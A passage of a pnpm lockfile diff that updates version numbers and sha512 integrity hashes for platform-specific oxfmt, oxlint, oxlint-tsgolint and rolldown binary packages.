sha512-/xapWCADfI5wrhxpEUjhI9fnw7MV5BUZizVa8e24n3VSK6A3Y1TB/ClOP1tfxNspykFKXp4NBWl6NtDJP3osqQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [freebsd] - '@oxfmt/binding-linux-arm-gnueabihf@0.35.0': - resolution: {integrity: sha512-u+kv3JD6P3J38oOyUaiCqgY5TNESzBRZJ5lyZQ6c2czUW2v5SIN9E/KWWa9vxoc+P8AFXQFUVrdzGy1tK+nbPQ==} + '@oxfmt/binding-linux-arm-gnueabihf@0.36.0': + resolution: {integrity: sha512-1lOmv61XMFIH5uNm27620kRRzWt/RK6tdn250BRDoG9W7OXGOQ5UyI1HVT+SFkoOoKztBiinWgi68+NA1MjBVQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [linux] - '@oxfmt/binding-linux-arm-musleabihf@0.35.0': - resolution: {integrity: sha512-1NiZroCiV57I7Pf8kOH4XGR366kW5zir3VfSMBU2D0V14GpYjiYmPYFAoJboZvp8ACnZKUReWyMkNKSa5ad58A==} + '@oxfmt/binding-linux-arm-musleabihf@0.36.0': + resolution: {integrity: sha512-vMH23AskdR1ujUS9sPck2Df9rBVoZUnCVY86jisILzIQ/QQ/yKUTi7tgnIvydPx7TyB/48wsQ5QMr5Knq5p/aw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [linux] - '@oxfmt/binding-linux-arm64-gnu@0.35.0': - resolution: {integrity: sha512-7Q0Xeg7ZnW2nxnZ4R7aF6DEbCFls4skgHZg+I63XitpNvJCbVIU8MFOTZlvZGRsY9+rPgWPQGeUpLHlyx0wvMA==} + '@oxfmt/binding-linux-arm64-gnu@0.36.0': + resolution: {integrity: sha512-Hy1V+zOBHpBiENRx77qrUTt5aPDHeCASRc8K5KwwAHkX2AKP0nV89eL17hsZrE9GmnXFjsNmd80lyf7aRTXsbw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [linux] - '@oxfmt/binding-linux-arm64-musl@0.35.0': - resolution: {integrity: sha512-5Okqi+uhYFxwKz8hcnUftNNwdm8BCkf6GSCbcz9xJxYMm87k1E4p7PEmAAbhLTk7cjSdDre6TDL0pDzNX+Y22Q==} + '@oxfmt/binding-linux-arm64-musl@0.36.0': + resolution: {integrity: sha512-SPGLJkOIHSIC6ABUQ5V8NqJpvYhMJueJv26NYqfCnwi/Mn6A61amkpJJ9Suy0Nmvs+OWESJpcebrBUbXPGZyQQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [linux] - '@oxfmt/binding-linux-ppc64-gnu@0.35.0': - resolution: {integrity: sha512-9k66pbZQXM/lBJWys3Xbc5yhl4JexyfqkEf/tvtq8976VIJnLAAL3M127xHA3ifYSqxdVHfVGTg84eiBHCGcNw==} + '@oxfmt/binding-linux-ppc64-gnu@0.36.0': + resolution: {integrity: sha512-3EuoyB8x9x8ysYJjbEO/M9fkSk72zQKnXCvpZMDHXlnY36/1qMp55Nm0PrCwjGO/1pen5hdOVkz9WmP3nAp2IQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [ppc64] os: [linux] - '@oxfmt/binding-linux-riscv64-gnu@0.35.0': - resolution: {integrity: sha512-aUcY9ofKPtjO52idT6t0SAQvEF6ctjzUQa1lLp7GDsRpSBvuTrBQGeq0rYKz3gN8dMIQ7mtMdGD9tT4LhR8jAQ==} + '@oxfmt/binding-linux-riscv64-gnu@0.36.0': + resolution: {integrity: sha512-MpY3itLwpGh8dnywtrZtaZ604T1m715SydCKy0+qTxetv+IHzuA+aO/AGzrlzUNYZZmtWtmDBrChZGibvZxbRQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [riscv64] os: [linux] - '@oxfmt/binding-linux-riscv64-musl@0.35.0': - resolution: {integrity: sha512-C6yhY5Hvc2sGM+mCPek9ZLe5xRUOC/BvhAt2qIWFAeXMn4il04EYIjl3DsWiJr0xDMTJhvMOmD55xTRPlNp39w==} + '@oxfmt/binding-linux-riscv64-musl@0.36.0': + resolution: {integrity: sha512-mmDhe4Vtx+XwQPRPn/V25+APnkApYgZ23q+6GVsNYY98pf3aU0aI3Me96pbRs/AfJ1jIiGC+/6q71FEu8dHcHw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [riscv64] os: [linux] - '@oxfmt/binding-linux-s390x-gnu@0.35.0': - resolution: {integrity: sha512-RG2hlvOMK4OMZpO3mt8MpxLQ0AAezlFqhn5mI/g5YrVbPFyoCv9a34AAvbSJS501ocOxlFIRcKEuw5hFvddf9g==} + '@oxfmt/binding-linux-s390x-gnu@0.36.0': + resolution: {integrity: sha512-AYXhU+DmNWLSnvVwkHM92fuYhogtVHab7UQrPNaDf1sxadugg9gWVmcgJDlIwxJdpk5CVW/TFvwUKwI432zhhA==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [s390x] os: [linux] - '@oxfmt/binding-linux-x64-gnu@0.35.0': - resolution: {integrity: sha512-wzmh90Pwvqj9xOKHJjkQYBpydRkaXG77ZvDz+iFDRRQpnqIEqGm5gmim2s6vnZIkDGsvKCuTdtxm0GFmBjM1+w==} + '@oxfmt/binding-linux-x64-gnu@0.36.0': + resolution: {integrity: sha512-H16QhhQ3usoakMleiAAQ2mg0NsBDAdyE9agUgfC8IHHh3jZEbr0rIKwjEqwbOHK5M0EmfhJmr+aGO/MgZPsneA==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [linux] - '@oxfmt/binding-linux-x64-musl@0.35.0': - resolution: {integrity: sha512-+HCqYCJPCUy5I+b2cf+gUVaApfgtoQT3HdnSg/l7NIcLHOhKstlYaGyrFZLmUpQt4WkFbpGKZZayG6zjRU0KFA==} + '@oxfmt/binding-linux-x64-musl@0.36.0': + resolution: {integrity: sha512-EFFGkixA39BcmHiCe2ECdrq02D6FCve5ka6ObbvrheXl4V+R0U/E+/uLyVx1X65LW8TA8QQHdnbdDallRekohw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [linux] - '@oxfmt/binding-openharmony-arm64@0.35.0': - resolution: {integrity: sha512-kFYmWfR9YL78XyO5ws+1dsxNvZoD973qfVMNFOS4e9bcHXGF7DvGC2tY5UDFwyMCeB33t3sDIuGONKggnVNSJA==} + '@oxfmt/binding-openharmony-arm64@0.36.0': + resolution: {integrity: sha512-zr/t369wZWFOj1qf06Z5gGNjFymfUNDrxKMmr7FKiDRVI1sNsdKRCuRL4XVjtcptKQ+ao3FfxLN1vrynivmCYg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [openharmony] - '@oxfmt/binding-win32-arm64-msvc@0.35.0': - resolution: {integrity: sha512-uD/NGdM65eKNCDGyTGdO8e9n3IHX+wwuorBvEYrPJXhDXL9qz6gzddmXH8EN04ejUXUujlq4FsoSeCfbg0Y+Jg==} + '@oxfmt/binding-win32-arm64-msvc@0.36.0': + resolution: {integrity: sha512-FxO7UksTv8h4olzACgrqAXNF6BP329+H322323iDrMB5V/+a1kcAw07fsOsUmqNrb9iJBsCQgH/zqcqp5903ag==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [win32] - '@oxfmt/binding-win32-ia32-msvc@0.35.0': - resolution: {integrity: sha512-oSRD2k8J2uxYDEKR2nAE/YTY9PobOEnhZgCmspHu0+yBQ665yH8lFErQVSTE7fcGJmJp/cC6322/gc8VFuQf7g==} + '@oxfmt/binding-win32-ia32-msvc@0.36.0': + resolution: {integrity: sha512-OjoMQ89H01M0oLMfr/CPNH1zi48ZIwxAKObUl57oh7ssUBNDp/2Vjf7E1TQ8M4oj4VFQ/byxl2SmcPNaI2YNDg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [ia32] os: [win32] - '@oxfmt/binding-win32-x64-msvc@0.35.0': - resolution: {integrity: sha512-WCDJjlS95NboR0ugI2BEwzt1tYvRDorDRM9Lvctls1SLyKYuNRCyrPwp1urUPFBnwgBNn9p2/gnmo7gFMySRoQ==} + '@oxfmt/binding-win32-x64-msvc@0.36.0': + resolution: {integrity: sha512-MoyeQ9S36ZTz/4bDhOKJgOBIDROd4dQ5AkT9iezhEaUBxAPdNX9Oq0jD8OSnCj3G4wam/XNxVWKMA52kmzmPtQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [win32] - '@oxlint-tsgolint/darwin-arm64@0.15.0': - resolution: {integrity: sha512-d7Ch+A6hic+RYrm32+Gh1o4lOrQqnFsHi721ORdHUDBiQPea+dssKUEMwIbA6MKmCy6TVJ02sQyi24OEfCiGzw==} + '@oxlint-tsgolint/darwin-arm64@0.16.0': + resolution: {integrity: sha512-WQt5lGwRPJBw7q2KNR0mSPDAaMmZmVvDlEEti96xLO7ONhyomQc6fBZxxwZ4qTFedjJnrHX94sFelZ4OKzS7UQ==} cpu: [arm64] os: [darwin] - '@oxlint-tsgolint/darwin-x64@0.15.0': - resolution: {integrity: sha512-Aoai2wAkaUJqp/uEs1gml6TbaPW4YmyO5Ai/vOSkiizgHqVctjhjKqmRiWTX2xuPY94VkwOLqp+Qr3y/0qSpWQ==} + '@oxlint-tsgolint/darwin-x64@0.16.0': + resolution: {integrity: sha512-VJo29XOzdkalvCTiE2v6FU3qZlgHaM8x8hUEVJGPU2i5W+FlocPpmn00+Ld2n7Q0pqIjyD5EyvZ5UmoIEJMfqg==} cpu: [x64] os: [darwin] - '@oxlint-tsgolint/linux-arm64@0.15.0': - resolution: {integrity: sha512-4og13a7ec4Vku5t2Y7s3zx6YJP6IKadb1uA9fOoRH6lm/wHWoCnxjcfJmKHXRZJII81WmbdJMSPxaBfwN/S68Q==} + '@oxlint-tsgolint/linux-arm64@0.16.0': + resolution: {integrity: sha512-MPfqRt1+XRHv9oHomcBMQ3KpTE+CSkZz14wUxDQoqTNdUlV0HWdzwIE9q65I3D9YyxEnqpM7j4qtDQ3apqVvbQ==} cpu: [arm64] os: [linux] - '@oxlint-tsgolint/linux-x64@0.15.0': - resolution: {integrity: sha512-9b9xzh/1Harn3a+XiKTK/8LrWw3VcqLfYp/vhV5/zAVR2Mt0d63WSp4FL+wG7DKnI2T/CbMFUFHwc7kCQjDMzQ==} + '@oxlint-tsgolint/linux-x64@0.16.0': + resolution: {integrity: sha512-XQSwVUsnwLokMhe1TD6IjgvW5WMTPzOGGkdFDtXWQmlN2YeTw94s/NN0KgDrn2agM1WIgAenEkvnm0u7NgwEyw==} cpu: [x64] os: [linux] - '@oxlint-tsgolint/win32-arm64@0.15.0': - resolution: {integrity: sha512-nNac5hewHdkk5mowOwTqB1ZD76zB/FsUiyUvdCyupq5cG54XyKqSLEp9QGbx7wFJkWCkeWmuwRed4sfpAlKaeA==} + '@oxlint-tsgolint/win32-arm64@0.16.0': + resolution: {integrity: sha512-EWdlspQiiFGsP2AiCYdhg5dTYyAlj6y1nRyNI2dQWq4Q/LITFHiSRVPe+7m7K7lcsZCEz2icN/bCeSkZaORqIg==} cpu: [arm64] os: [win32] - '@oxlint-tsgolint/win32-x64@0.15.0': - resolution: {integrity: sha512-ioAY2XLpy83E2EqOLH9p1cEgj0G2qB1lmAn0a3yFV1jHQB29LIPIKGNsu/tYCClpwmHN79pT5KZAHZOgWxxqNg==} + '@oxlint-tsgolint/win32-x64@0.16.0': + resolution: {integrity: sha512-1ufk8cgktXJuJZHKF63zCHAkaLMwZrEXnZ89H2y6NO85PtOXqu4zbdNl0VBpPP3fCUuUBu9RvNqMFiv0VsbXWA==} cpu: [x64] os: [win32] - '@oxlint/binding-android-arm-eabi@1.50.0': - resolution: {integrity: sha512-G7MRGk/6NCe+L8ntonRdZP7IkBfEpiZ/he3buLK6JkLgMHgJShXZ+BeOwADmspXez7U7F7L1Anf4xLSkLHiGTg==} + '@oxlint/binding-android-arm-eabi@1.51.0': + resolution: {integrity: sha512-jJYIqbx4sX+suIxWstc4P7SzhEwb4ArWA2KVrmEuu9vH2i0qM6QIHz/ehmbGE4/2fZbpuMuBzTl7UkfNoqiSgw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [android] - '@oxlint/binding-android-arm64@1.50.0': - resolution: {integrity: sha512-GeSuMoJWCVpovJi/e3xDSNgjeR8WEZ6MCXL6EtPiCIM2NTzv7LbflARINTXTJy2oFBYyvdf/l2PwHzYo6EdXvg==} + '@oxlint/binding-android-arm64@1.51.0': + resolution: {integrity: sha512-GtXyBCcH4ti98YdiMNCrpBNGitx87EjEWxevnyhcBK12k/Vu4EzSB45rzSC4fGFUD6sQgeaxItRCEEWeVwPafw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [android] - '@oxlint/binding-darwin-arm64@1.50.0': - resolution: {integrity: sha512-w3SY5YtxGnxCHPJ8Twl3KmS9oja1gERYk3AMoZ7Hv8P43ZtB6HVfs02TxvarxfL214Tm3uzvc2vn+DhtUNeKnw==} + '@oxlint/binding-darwin-arm64@1.51.0': + resolution: {integrity: sha512-3QJbeYaMHn6Bh2XeBXuITSsbnIctyTjvHf5nRjKYrT9pPeErNIpp5VDEeAXC0CZSwSVTsc8WOSDwgrAI24JolQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [darwin] - '@oxlint/binding-darwin-x64@1.50.0': - resolution: {integrity: sha512-hNfogDqy7tvmllXKBSlHo6k5x7dhTUVOHbMSE15CCAcXzmqf5883aPvBYPOq9AE7DpDUQUZ1kVE22YbiGW+tuw==} + '@oxlint/binding-darwin-x64@1.51.0': + resolution: {integrity: sha512-NzErhMaTEN1cY0E8C5APy74lw5VwsNfJfVPBMWPVQLqAbO0k4FFLjvHURvkUL+Y18Wu+8Vs1kbqPh2hjXYA4pg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [darwin] - '@oxlint/binding-freebsd-x64@1.50.0': - resolution: {integrity: sha512-ykZevOWEyu0nsxolA911ucxpEv0ahw8jfEeGWOwwb/VPoE4xoexuTOAiPNlWZNJqANlJl7yp8OyzCtXTUAxotw==} + '@oxlint/binding-freebsd-x64@1.51.0': + resolution: {integrity: sha512-msAIh3vPAoKoHlOE/oe6Q5C/n9umypv/k81lED82ibrJotn+3YG2Qp1kiR8o/Dg5iOEU97c6tl0utxcyFenpFw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [freebsd] - '@oxlint/binding-linux-arm-gnueabihf@1.50.0': - resolution: {integrity: sha512-hif3iDk7vo5GGJ4OLCCZAf2vjnU9FztGw4L0MbQL0M2iY9LKFtDMMiQAHmkF0PQGQMVbTYtPdXCLKVgdkiqWXQ==} + '@oxlint/binding-linux-arm-gnueabihf@1.51.0': + resolution: {integrity: sha512-CqQPcvqYyMe9ZBot2stjGogEzk1z8gGAngIX7srSzrzexmXixwVxBdFZyxTVM0CjGfDeV+Ru0w25/WNjlMM2Hw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [linux] - '@oxlint/binding-linux-arm-musleabihf@1.50.0': - resolution: {integrity: sha512-dVp9iSssiGAnTNey2Ruf6xUaQhdnvcFOJyRWd/mu5o2jVbFK15E5fbWGeFRfmuobu5QXuROtFga44+7DOS3PLg==} + '@oxlint/binding-linux-arm-musleabihf@1.51.0': + resolution: {integrity: sha512-dstrlYQgZMnyOssxSbolGCge/sDbko12N/35RBNuqLpoPbft2aeBidBAb0dvQlyBd9RJ6u8D4o4Eh8Un6iTgyQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [linux] - '@oxlint/binding-linux-arm64-gnu@1.50.0': - resolution: {integrity: sha512-1cT7yz2HA910CKA9NkH1ZJo50vTtmND2fkoW1oyiSb0j6WvNtJ0Wx2zoySfXWc/c+7HFoqRK5AbEoL41LOn9oA==} + '@oxlint/binding-linux-arm64-gnu@1.51.0': + resolution: {integrity: sha512-QEjUpXO7d35rP1/raLGGbAsBLLGZIzV3ZbeSjqWlD3oRnxpRIZ6iL4o51XQHkconn3uKssc+1VKdtHJ81BBhDA==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [linux] - '@oxlint/binding-linux-arm64-musl@1.50.0': - resolution: {integrity: sha512-++B3k/HEPFVlj89cOz8kWfQccMZB/aWL9AhsW7jPIkG++63Mpwb2cE9XOEsd0PATbIan78k2Gky+09uWM1d/gQ==} + '@oxlint/binding-linux-arm64-musl@1.51.0': + resolution: {integrity: sha512-YSJua5irtG4DoMAjUapDTPhkQLHhBIY0G9JqlZS6/SZPzqDkPku/1GdWs0D6h/wyx0Iz31lNCfIaWKBQhzP0wQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [linux] - '@oxlint/binding-linux-ppc64-gnu@1.50.0': - resolution: {integrity: sha512-Z9b/KpFMkx66w3gVBqjIC1AJBTZAGoI9+U+K5L4QM0CB/G0JSNC1es9b3Y0Vcrlvtdn8A+IQTkYjd/Q0uCSaZw==} + '@oxlint/binding-linux-ppc64-gnu@1.51.0': + resolution: {integrity: sha512-7L4Wj2IEUNDETKssB9IDYt16T6WlF+X2jgC/hBq3diGHda9vJLpAgb09+D3quFq7TdkFtI7hwz/jmuQmQFPc1Q==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [ppc64] os: [linux] - '@oxlint/binding-linux-riscv64-gnu@1.50.0': - resolution: {integrity: sha512-jvmuIw8wRSohsQlFNIST5uUwkEtEJmOQYr33bf/K2FrFPXHhM4KqGekI3ShYJemFS/gARVacQFgBzzJKCAyJjg==} + '@oxlint/binding-linux-riscv64-gnu@1.51.0': + resolution: {integrity: sha512-cBUHqtOXy76G41lOB401qpFoKx1xq17qYkhWrLSM7eEjiHM9sOtYqpr6ZdqCnN9s6ZpzudX4EkeHOFH2E9q0vA==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [riscv64] os: [linux] - '@oxlint/binding-linux-riscv64-musl@1.50.0': - resolution: {integrity: sha512-x+UrN47oYNh90nmAAyql8eQaaRpHbDPu5guasDg10+OpszUQ3/1+1J6zFMmV4xfIEgTcUXG/oI5fxJhF4eWCNA==} + '@oxlint/binding-linux-riscv64-musl@1.51.0': + resolution: {integrity: sha512-WKbg8CysgZcHfZX0ixQFBRSBvFZUHa3SBnEjHY2FVYt2nbNJEjzTxA3ZR5wMU0NOCNKIAFUFvAh5/XJKPRJuJg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [riscv64] os: [linux] - '@oxlint/binding-linux-s390x-gnu@1.50.0': - resolution: {integrity: sha512-i/JLi2ljLUIVfekMj4ISmdt+Hn11wzYUdRRrkVUYsCWw7zAy5xV7X9iA+KMyM156LTFympa7s3oKBjuCLoTAUQ==} + '@oxlint/binding-linux-s390x-gnu@1.51.0': + resolution: {integrity: sha512-N1QRUvJTxqXNSu35YOufdjsAVmKVx5bkrggOWAhTWBc3J4qjcBwr1IfyLh/6YCg8sYRSR1GraldS9jUgJL/U4A==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [s390x] os: [linux] - '@oxlint/binding-linux-x64-gnu@1.50.0': - resolution: {integrity: sha512-/C7brhn6c6UUPccgSPCcpLQXcp+xKIW/3sji/5VZ8/OItL3tQ2U7KalHz887UxxSQeEOmd1kY6lrpuwFnmNqOA==} + '@oxlint/binding-linux-x64-gnu@1.51.0': + resolution: {integrity: sha512-e0Mz0DizsCoqNIjeOg6OUKe8JKJWZ5zZlwsd05Bmr51Jo3AOL4UJnPvwKumr4BBtBrDZkCmOLhCvDGm95nJM2g==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [linux] - '@oxlint/binding-linux-x64-musl@1.50.0': - resolution: {integrity: sha512-oDR1f+bGOYU8LfgtEW8XtotWGB63ghtcxk5Jm6IDTCk++rTA/IRMsjOid2iMd+1bW+nP9Mdsmcdc7VbPD3+iyQ==} + '@oxlint/binding-linux-x64-musl@1.51.0': + resolution: {integrity: sha512-wD8HGTWhYBKXvRDvoBVB1y+fEYV01samhWQSy1Zkxq2vpezvMnjaFKRuiP6tBNITLGuffbNDEXOwcAhJ3gI5Ug==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [linux] - '@oxlint/binding-openharmony-arm64@1.50.0': - resolution: {integrity: sha512-4CmRGPp5UpvXyu4jjP9Tey/SrXDQLRvZXm4pb4vdZBxAzbFZkCyh0KyRy4txld/kZKTJlW4TO8N1JKrNEk+mWw==} + '@oxlint/binding-openharmony-arm64@1.51.0': + resolution: {integrity: sha512-5NSwQ2hDEJ0GPXqikjWtwzgAQCsS7P9aLMNenjjKa+gknN3lTCwwwERsT6lKXSirfU3jLjexA2XQvQALh5h27w==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [openharmony] - '@oxlint/binding-win32-arm64-msvc@1.50.0': - resolution: {integrity: sha512-Fq0M6vsGcFsSfeuWAACDhd5KJrO85ckbEfe1EGuBj+KPyJz7KeWte2fSFrFGmNKNXyhEMyx4tbgxiWRujBM2KQ==} + '@oxlint/binding-win32-arm64-msvc@1.51.0': + resolution: {integrity: sha512-JEZyah1M0RHMw8d+jjSSJmSmO8sABA1J1RtrHYujGPeCkYg1NeH0TGuClpe2h5QtioRTaF57y/TZfn/2IFV6fA==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [win32] - '@oxlint/binding-win32-ia32-msvc@1.50.0': - resolution: {integrity: sha512-qTdWR9KwY/vxJGhHVIZG2eBOhidOQvOwzDxnX+jhW/zIVacal1nAhR8GLkiywW8BIFDkQKXo/zOfT+/DY+ns/w==} + '@oxlint/binding-win32-ia32-msvc@1.51.0': + resolution: {integrity: sha512-q3cEoKH6kwjz/WRyHwSf0nlD2F5Qw536kCXvmlSu+kaShzgrA0ojmh45CA81qL+7udfCaZL2SdKCZlLiGBVFlg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [ia32] os: [win32] - '@oxlint/binding-win32-x64-msvc@1.50.0': - resolution: {integrity: sha512-682t7npLC4G2Ca+iNlI9fhAKTcFPYYXJjwoa88H4q+u5HHHlsnL/gHULapX3iqp+A8FIJbgdylL5KMYo2LaluQ==} + '@oxlint/binding-win32-x64-msvc@1.51.0': + resolution: {integrity: sha512-Q14+fOGb9T28nWF/0EUsYqERiRA7cl1oy4TJrGmLaqhm+aO2cV+JttboHI3CbdeMCAyDI1+NoSlrM7Melhp/cw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [win32] @@ -2344,85 +2463,97 @@ packages: resolution: {integrity: sha512-DmCG8GzysnCZ15bres3N5AHCmwBwYgp0As6xjhQ47rAUTUXxJiK+lLUxaGsX3hd/30qUpVElh05PbGuxRPgJwA==} engines: {node: '>= 10'} - '@rolldown/binding-android-arm64@1.0.0-rc.5': - resolution: {integrity: sha512-zCEmUrt1bggwgBgeKLxNj217J1OrChrp3jJt24VK9jAharSTeVaHODNL+LpcQVhRz+FktYWfT9cjo5oZ99ZLpg==} + '@rolldown/binding-android-arm64@1.0.0-rc.7': + resolution: {integrity: sha512-/uadfNUaMLFFBGvcIOiq8NnlhvTZTjOyybJaJnhGxD0n9k5vZRJfTaitH5GHnbwmc6T2PC+ZpS1FQH+vXyS/UA==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [android] - '@rolldown/binding-darwin-arm64@1.0.0-rc.5': - resolution: {integrity: sha512-ZP9xb9lPAex36pvkNWCjSEJW/Gfdm9I3ssiqOFLmpZ/vosPXgpoGxCmh+dX1Qs+/bWQE6toNFXWWL8vYoKoK9Q==} + '@rolldown/binding-darwin-arm64@1.0.0-rc.7': + resolution: {integrity: sha512-zokYr1KgRn0hRA89dmgtPj/BmKp9DxgrfAJvOEFfXa8nfYWW2nmgiYIBGpSIAJrEg7Qc/Qznovy6xYwmKh0M8g==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [darwin] - '@rolldown/binding-darwin-x64@1.0.0-rc.5': - resolution: {integrity: sha512-7IdrPunf6dp9mywMgTOKMMGDnMHQ6+h5gRl6LW8rhD8WK2kXX0IwzcM5Zc0B5J7xQs8QWOlKjv8BJsU/1CD3pg==} + '@rolldown/binding-darwin-x64@1.0.0-rc.7': + resolution: {integrity: sha512-eZFjbmrapCBVgMmuLALH3pmQQQStHFuRhsFceJHk6KISW8CkI2e9OPLp9V4qXksrySQcD8XM8fpvGLs5l5C7LQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [darwin] - '@rolldown/binding-freebsd-x64@1.0.0-rc.5': - resolution: {integrity: sha512-o/JCk+dL0IN68EBhZ4DqfsfvxPfMeoM6cJtxORC1YYoxGHZyth2Kb2maXDb4oddw2wu8iIbnYXYPEzBtAF5CAg==} + '@rolldown/binding-freebsd-x64@1.0.0-rc.7': + resolution: {integrity: sha512-xjMrh8Dmu2DNwdY6DZsrF6YPGeesc3PaTlkh8v9cqmkSCNeTxnhX3ErhVnuv1j3n8t2IuuhQIwM9eZDINNEt5Q==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [freebsd] - '@rolldown/binding-linux-arm-gnueabihf@1.0.0-rc.5': - resolution: {integrity: sha512-IIBwTtA6VwxQLcEgq2mfrUgam7VvPZjhd/jxmeS1npM+edWsrrpRLHUdze+sk4rhb8/xpP3flemgcZXXUW6ukw==} + '@rolldown/binding-linux-arm-gnueabihf@1.0.0-rc.7': + resolution: {integrity: sha512-mOvftrHiXg4/xFdxJY3T9Wl1/zDAOSlMN8z9an2bXsCwuvv3RdyhYbSMZDuDO52S04w9z7+cBd90lvQSPTAQtw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [linux] - '@rolldown/binding-linux-arm64-gnu@1.0.0-rc.5': - resolution: {integrity: sha512-KSol1De1spMZL+Xg7K5IBWXIvRWv7+pveaxFWXpezezAG7CS6ojzRjtCGCiLxQricutTAi/LkNWKMsd2wNhMKQ==} + '@rolldown/binding-linux-arm64-gnu@1.0.0-rc.7': + resolution: {integrity: sha512-TuUkeuEEPRyXMBbJ86NRhAiPNezxHW8merl3Om2HASA9Pl1rI+VZcTtsVQ6v/P0MDIFpSl0k0+tUUze9HIXyEw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [linux] - '@rolldown/binding-linux-arm64-musl@1.0.0-rc.5': - resolution: {integrity: sha512-WFljyDkxtXRlWxMjxeegf7xMYXxUr8u7JdXlOEWKYgDqEgxUnSEsVDxBiNWQ1D5kQKwf8Wo4sVKEYPRhCdsjwA==} + '@rolldown/binding-linux-arm64-musl@1.0.0-rc.7': + resolution: {integrity: sha512-G43ZElEvaby+YSOgrXfBgpeQv42LdS0ivFFYQufk2tBDWeBfzE/+ob5DmO8Izbyn4Y8k6GgLF11jFDYNnmU/3w==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [linux] - '@rolldown/binding-linux-x64-gnu@1.0.0-rc.5': - resolution: {integrity: sha512-CUlplTujmbDWp2gamvrqVKi2Or8lmngXT1WxsizJfts7JrvfGhZObciaY/+CbdbS9qNnskvwMZNEhTPrn7b+WA==} + '@rolldown/binding-linux-ppc64-gnu@1.0.0-rc.7': + resolution: {integrity: sha512-Y48ShVxGE2zUTt0A0PR3grCLNxW4DWtAfe5lxf6L3uYEQujwo/LGuRogMsAtOJeYLCPTJo2i714LOdnK34cHpw==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [ppc64] + os: [linux] + + '@rolldown/binding-linux-s390x-gnu@1.0.0-rc.7': + resolution: {integrity: sha512-KU5DUYvX3qI8/TX6D3RA4awXi4Ge/1+M6Jqv7kRiUndpqoVGgD765xhV3Q6QvtABnYjLJenrWDl3S1B5U56ixA==} + engines: {node: ^20.19.0 || >=22.12.0} + cpu: [s390x] + os: [linux] + + '@rolldown/binding-linux-x64-gnu@1.0.0-rc.7': + resolution: {integrity: sha512-1THb6FdBkAEL12zvUue2bmK4W1+P+tz8Pgu5uEzq+xrtYa3iBzmmKNlyfUzCFNCqsPd8WJEQrYdLcw4iMW4AVw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [linux] - '@rolldown/binding-linux-x64-musl@1.0.0-rc.5': - resolution: {integrity: sha512-wdf7g9NbVZCeAo2iGhsjJb7I8ZFfs6X8bumfrWg82VK+8P6AlLXwk48a1ASiJQDTS7Svq2xVzZg3sGO2aXpHRA==} + '@rolldown/binding-linux-x64-musl@1.0.0-rc.7': + resolution: {integrity: sha512-12o73atFNWDgYnLyA52QEUn9AH8pHIe12W28cmqjyHt4bIEYRzMICvYVCPa2IQm6DJBvCBrEhD9K+ct4wr2hwg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [linux] - '@rolldown/binding-openharmony-arm64@1.0.0-rc.5': - resolution: {integrity: sha512-0CWY7ubu12nhzz+tkpHjoG3IRSTlWYe0wrfJRf4qqjqQSGtAYgoL9kwzdvlhaFdZ5ffVeyYw9qLsChcjUMEloQ==} + '@rolldown/binding-openharmony-arm64@1.0.0-rc.7': + resolution: {integrity: sha512-+uUgGwvuUCXl894MTsmTS2J0BnCZccFsmzV7y1jFxW5pTSxkuwL5agyPuDvDOztPeS6RrdqWkn7sT0jRd0ECkg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [openharmony] - '@rolldown/binding-wasm32-wasi@1.0.0-rc.5': - resolution: {integrity: sha512-LztXnGzv6t2u830mnZrFLRVqT/DPJ9DL4ZTz/y93rqUVkeHjMMYIYaFj+BUthiYxbVH9dH0SZYufETspKY/NhA==} + '@rolldown/binding-wasm32-wasi@1.0.0-rc.7': + resolution: {integrity: sha512-53p2L/NSy21UiFOqUGlC11kJDZS2Nx2GJRz1QvbkXovypA3cOHbsyZHLkV72JsLSbiEQe+kg4tndUhSiC31UEA==} engines: {node: '>=14.0.0'} cpu: [wasm32] - 